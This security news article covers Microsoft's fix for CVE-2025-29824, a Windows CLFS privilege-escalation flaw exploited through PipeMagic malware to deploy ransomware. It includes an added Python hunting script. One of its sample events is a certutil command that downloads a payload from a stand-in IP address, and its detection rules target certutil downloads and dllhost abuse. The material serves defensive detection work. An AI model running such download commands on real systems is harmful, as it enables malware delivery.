Windows CLFS Vulnerability Under Active Exploitation

Microsoft has fixed a vulnerability identified in the Windows Common Log File System (CLFS). A threat actor tracked as Storm-2460 is actively exploiting the vulnerability using PipeMagic malware. The attacker uses the malware to exploit the vulnerability, elevate privileges, and then spread ransomware across the victim's network.

Windows CLFS is a logging subsystem used to record transactions. CVE-2025-29824 is a use-after-free vulnerability in the CLFS kernel driver. Despite its CVSS base score of 7.8 (high severity), the vulnerability cannot be exploited remotely; an attacker must already have a foothold on the system.

PipeMagic malware was first discovered in 2022 and provides a backdoor into compromised systems. It has previously been used to enable exploitation of other vulnerabilities and has been observed being delivered through a fake ChatGPT app, though the initial access vector used in the most recent attacks has not yet been confirmed. Microsoft has observed the threat actor using the certutil utility to download a file containing an encrypted PipeMagic payload. The threat actor then used PipeMagic to exploit the vulnerability in memory through a dllhost.exe process.
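The two behaviours described above (certutil fetching a remote file, and dllhost.exe being used to host the in-memory exploit) are both visible in process-creation telemetry. The following is an added example, not code from the article or from Microsoft, that applies two simple hunting rules to constructed sample events; the field names, the sample records, and the list of "expected" dllhost.exe parents are assumptions that would need tuning to a real environment.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # full path of the created process
    cmdline: str  # command line as logged by the EDR / Sysmon Event ID 1
    parent: str   # full path of the parent process


# Constructed sample records (not real telemetry). Record 0 and record 3
# model the behaviour described in the article; records 1 and 2 are benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://198.51.100.7/u.bin C:\\Users\\Public\\u.bin",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              "certutil -verify corp-ca.cer",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\dllhost.exe",
              "dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\dllhost.exe",
              "dllhost.exe",
              r"C:\Users\Public\u.exe"),
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumption: in this environment dllhost.exe is normally started by svchost.exe
# (COM Surrogate); anything else is worth a look.
EXPECTED_DLLHOST_PARENTS = {"svchost.exe"}


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def flag_events(events):
    """Return (rule_name, event) pairs for records matching either hunting rule."""
    findings = []
    for ev in events:
        name = image_name(ev.image)
        # Rule 1: certutil given a URL on its command line (download abuse).
        if name == "certutil.exe" and URL_RE.search(ev.cmdline):
            findings.append(("certutil_download", ev))
        # Rule 2: dllhost.exe launched by an unexpected parent process.
        if name == "dllhost.exe" and image_name(ev.parent) not in EXPECTED_DLLHOST_PARENTS:
            findings.append(("dllhost_unusual_parent", ev))
    return findings
```

Both rules will produce false positives on their own; they are meant as a starting point for a hunt, with the hits correlated against patch status for CVE-2025-29824 on the affected hosts.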

An attacker with local, authenticated access could exploit the vulnerability to elevate privileges to SYSTEM level and enable the next stage of the attack: deploying ransomware across the compromised network. The vulnerability affects several versions of Windows and Windows Server, though customers running Windows 11 version 24H2 do not appear to have been targeted, even though the vulnerability is present in that version.

Microsoft reports that the RansomEXX ransomware group has so far exploited the vulnerability in a limited number of attacks on organizations in the IT, real estate, and financial services sectors. Organizations in other industries may likewise be targeted. Because the vulnerability is under active exploitation, Microsoft customers are urged to apply the patch for this vulnerability, along with the patches for the other elevation-of-privilege vulnerabilities addressed in the April 2025 Patch Tuesday updates, to strengthen their defenses against ransomware attacks. HIPAA-covered entities that use Windows CLFS should also take note of this advisory.

James Keogh

James Keogh has been writing about the healthcare sector in the United States for several years and is currently the editor of HIPAAnswers. He has a particular interest in HIPAA and the intersection of healthcare privacy and information technology. He has developed specialized knowledge in HIPAA-related issues, including compliance, patient privacy, and data breaches. You can follow James on Twitter https://x.com/JamesKeoghHIPAA and contact James on LinkedIn https://www.linkedin.com/in/james-keogh-89023681 or email directly at [email protected]